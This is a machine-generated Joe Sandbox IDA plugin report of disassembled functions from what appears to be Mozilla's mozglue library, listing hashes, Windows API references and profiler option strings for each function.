Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset
String ID: ~qgl
API String ID: 2221118986-2435832519
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 179cccb7540f13821518fde36926f7931901db4a7b2938a7be728f08da44b098
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 43B1D772E0920ACFDB14CF58CC816DDB7B2EF89314F15026AC949DB795D730A989CB94

Function 6C67BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C67C1CB
__aulldiv.LIBCMT ref: 6C67C24C
__aulldiv.LIBCMT ref: 6C67C348
__aullrem.LIBCMT ref: 6C67C365
__aulldiv.LIBCMT ref: 6C67C37D

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: 52e5610b254ab1e3d698076bc7752cc4bb22ea2adc653a9c033408f335aa4919
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: AE320432B186119FC718DE2CC890656BBE6AFC9310F098A6DE896CB395D730ED05CB91

Function 6C6B6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C6B6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6B6E1E

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: e2761360f82e577d7b3459f93c193f9348bacba4c8d4969b027054e03b263c9f
Instruction ID: 76678a0436b64b360cde52552533b2dc78af67a2c3d412eb77134cc9e6ca7040
Opcode Fuzzy Hash: e2761360f82e577d7b3459f93c193f9348bacba4c8d4969b027054e03b263c9f
Instruction Fuzzy Hash: 23A17B706183818FD714CF25C490BAEBBF6BF89308F44491DE88A97751DB70E859CB9A

Function 6C694640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C694777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C695585, 6C6955A8, 6C6955C3, 6C695624

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 145bb1e6827eda2abe0576019fe4a03c5879710e974ed75687c13e5849d973b4
Instruction ID: 5d3aee45db6cb9ce28a9d32d5f5cb434b8f126b184be3c0e78029d84d95291bd
Opcode Fuzzy Hash: 145bb1e6827eda2abe0576019fe4a03c5879710e974ed75687c13e5849d973b4
Instruction Fuzzy Hash: D2B27E71A057028FC708CF19C590725FBE2BFC5328B29C7ADE46A8B6A5D771D841CB89

Function 6C6D85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6D8C7C
__aulldiv.LIBCMT ref: 6C6D8DD7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 24a12f7af4b352b86b51eaa42da958b1e328a3afd7888ab961037a568f1c24a7
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 76328231F001198BDF18CE9DC4A57AEB7B2FB8C314F16913AE406BB7A0D634AD458B95

Function 6C6E76E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~qgl, xrefs: 6C6E7B0B, 6C6E793C, 6C6E7796, 6C6E79C0, 6C6E79FB, 6C6E7E0B

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID: ~qgl
API String ID: 0-2435832519
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 59974509702a7c1ac37aa06dd66479e9195116a469f54b7913160ff6ef9559b3
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: 96321A71E056198FCB14CF98C890AADFBF2FF88308F54816AC549A7746D731A986CF94

Function 6C6E6E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~qgl, xrefs: 6C6E7C72, 6C6E7B0B, 6C6E793C, 6C6E7C03, 6C6E79C0, 6C6E79FB, 6C6E7E0B

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID: ~qgl
API String ID: 0-2435832519
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 92af6b943a235a8ad83edbb54344e0edcce7c6a9e57caf7c8ef5a2dedaec93c9
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: 8122E971E052198FCB14CF98C880AADF7F2FF89304F6481AAC549A7746D731A986CF94

Function 6C6B5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C684A63,?,?), ref: 6C6B5F06

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: c6ed93c942321cdde50fc77f83fa0f7d08937cc352579db769f12d224cb5d089
Instruction ID: fa820bcb0ffc596a418f17d9a379f4342ddb9c4de5f05788853e618733f1e3da
Opcode Fuzzy Hash: c6ed93c942321cdde50fc77f83fa0f7d08937cc352579db769f12d224cb5d089
Instruction Fuzzy Hash: F2C19B75E012198BCB04CF99C1906EEBBF2BF8A318F28425DD8557BB44D732A816CF84

Function 6C6A0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 7570ab65d7d2ec532a15f2d58645eb7d4814c0c14b3e66b246251c2e35266c29
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 4F22F371E04629CFCB14CF98C890AADF7B2BF89308F548299D54AA7705D731AD86CF84

Function 6C6EAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f6e59a31cf7840b41f8d4345d1a083ab096da8f7c16775c0165708ec7d980b
Instruction ID: 9d3766d894ed6901f423c4ab5b40b5f3a877eb3fb0a6c11cbce35193a2e06e0b
Opcode Fuzzy Hash: c1f6e59a31cf7840b41f8d4345d1a083ab096da8f7c16775c0165708ec7d980b
Instruction Fuzzy Hash: FBF13B7160E7454FD700CF28C8903AABBF2AFCD318F158A2EE4D487782E7749845879A

Function 6C67C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 4796540bad80fdb763cbda03a66135823f4679d98d5aa3f5a3e43d1c3bc69f3c
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 94A1C571F0021A9FDB14DE69C8913AEB7F2AFC9354F148529D916E7781DB345C068BD0

Function 6C6D55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C6AE1A5), ref: 6C6D5606
LoadLibraryW.KERNEL32(gdi32,?,6C6AE1A5), ref: 6C6D560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6D5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6D563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6D566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6D567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6D5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6D56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6D56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6D56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6D56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6D5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6D572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6D5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6D5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6D577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6D5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6D57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6D57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6D57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6D57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6D57FF

Strings

GetMonitorInfoW, xrefs: 6C6D57A2
LoadCursorW, xrefs: 6C6D5774
GetThreadDpiAwarenessContext, xrefs: 6C6D562D
SetWindowPos, xrefs: 6C6D56F7
ReleaseDC, xrefs: 6C6D5742
GetWindowDC, xrefs: 6C6D5710
RegisterClassW, xrefs: 6C6D56AC
MonitorFromWindow, xrefs: 6C6D578D
SetWindowLongPtrW, xrefs: 6C6D57B7
GetSystemMetricsForDpi, xrefs: 6C6D5677
LoadIconW, xrefs: 6C6D575B
StretchDIBits, xrefs: 6C6D57CC
DeleteObject, xrefs: 6C6D57F9
CreateWindowExW, xrefs: 6C6D56C5
FillRect, xrefs: 6C6D5729
user32, xrefs: 6C6D5601
AreDpiAwarenessContextsEqual, xrefs: 6C6D5637
gdi32, xrefs: 6C6D560A
EnableNonClientDpiScaling, xrefs: 6C6D5666
GetDpiForWindow, xrefs: 6C6D5690
ShowWindow, xrefs: 6C6D56DE
CreateSolidBrush, xrefs: 6C6D57E4

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
Instruction ID: ecd2db558557c5717d38de9d7c68849a3b39153adceaae49f70f04f4c3a3b96b
Opcode Fuzzy Hash: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
Instruction Fuzzy Hash: 38514FF0A113129BEB019F36AD84D263AFBAB57385F114429A931E2A41EF70D805CF6D

Function 6C6BCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C68582D), ref: 6C6BCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C68582D), ref: 6C6BCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6EFE98,?,?,?,?,?,6C68582D), ref: 6C6BCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C6BCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C6BCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C6BCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C6BCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C6BCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C6BCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C6BCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C6BCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C6BCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C6BCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C6BCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C6BCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C6BCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C6BCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C6BCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C6BCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C6BCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C6BCE8A

Strings

samplingallthreads, xrefs: 6C6BCE2C
power, xrefs: 6C6BCE84
processcpu, xrefs: 6C6BCE6E
default, xrefs: 6C6BCC21
mainthreadio, xrefs: 6C6BCC7C
jsallocations, xrefs: 6C6BCD0E
seqstyle, xrefs: 6C6BCCE6
markersallthreads, xrefs: 6C6BCE42
noiostacks, xrefs: 6C6BCCBE
stackwalk, xrefs: 6C6BCCF8
leaf, xrefs: 6C6BCC66
preferencereads, xrefs: 6C6BCD92
ipcmessages, xrefs: 6C6BCDBE
notimerresolutionchange, xrefs: 6C6BCE00
nostacksampling, xrefs: 6C6BCD7C
unregisteredthreads, xrefs: 6C6BCE58
fileio, xrefs: 6C6BCC92
cpuallthreads, xrefs: 6C6BCE16
audiocallbacktracing, xrefs: 6C6BCDD4
java, xrefs: 6C6BCC37
fileioall, xrefs: 6C6BCCA8
Unrecognized feature "%s"., xrefs: 6C6BCEA0
screenshots, xrefs: 6C6BCCD4
nativeallocations, xrefs: 6C6BCDA8

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
Instruction ID: eb33a2cc2fe9242b4db6972d19d4383660d1911652fb0c5d369798ba54e1f83d
Opcode Fuzzy Hash: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
Instruction Fuzzy Hash: 895168C5A4B32572FA0032196D247EA1889EF57349F104437EE27B5E80FB259726C7AF

Function 6C684470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C684730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6844B2,6C6FE21C,6C6FF7F8), ref: 6C68473E
Part of subcall function 6C684730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C68474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6844BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6844D2
InitOnceExecuteOnce.KERNEL32(6C6FF80C,6C67F240,?,?), ref: 6C68451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68455C
LoadLibraryW.KERNEL32(?), ref: 6C684592
InitializeCriticalSection.KERNEL32(6C6FF770), ref: 6C6845A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6845AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6845BB
InitOnceExecuteOnce.KERNEL32(6C6FF818,6C67F240,?,?), ref: 6C684612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C684636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C684644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C68466D
VerSetConditionMask.NTDLL ref: 6C68469F
VerSetConditionMask.NTDLL ref: 6C6846AB
VerSetConditionMask.NTDLL ref: 6C6846B2
VerSetConditionMask.NTDLL ref: 6C6846B9
VerSetConditionMask.NTDLL ref: 6C6846C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6846CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6846F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6846FD

Strings

Gol, xrefs: 6C6844FC
kernel32.dll, xrefs: 6C6844CD
WRusr.dll, xrefs: 6C6844B5
user32.dll, xrefs: 6C684557, 6C68463F
l, xrefs: 6C684578
NativeNtBlockSet_Write, xrefs: 6C6846F7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gol$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3475055706
Opcode ID: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
Instruction ID: 7c0f11e83dde93449c505f2681fff3361a1cfd80bdca339322d3da4dfa917ae4
Opcode Fuzzy Hash: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
Instruction Fuzzy Hash: 5B6149B0605348AFEB108F62EC95BA57BFAEF47348F048458E5248B641D7F18946CF6E

Function 6C6BF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C6BF8F9

Part of subcall function 6C686390: GetCurrentThreadId.KERNEL32 ref: 6C6863D0
Part of subcall function 6C686390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6863DF
Part of subcall function 6C686390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C68640E

ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF93A
GetCurrentThreadId.KERNEL32 ref: 6C6BF98A
GetCurrentThreadId.KERNEL32 ref: 6C6BF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF716

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

Part of subcall function 6C67B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C67B5E0

GetCurrentThreadId.KERNEL32 ref: 6C6BF739
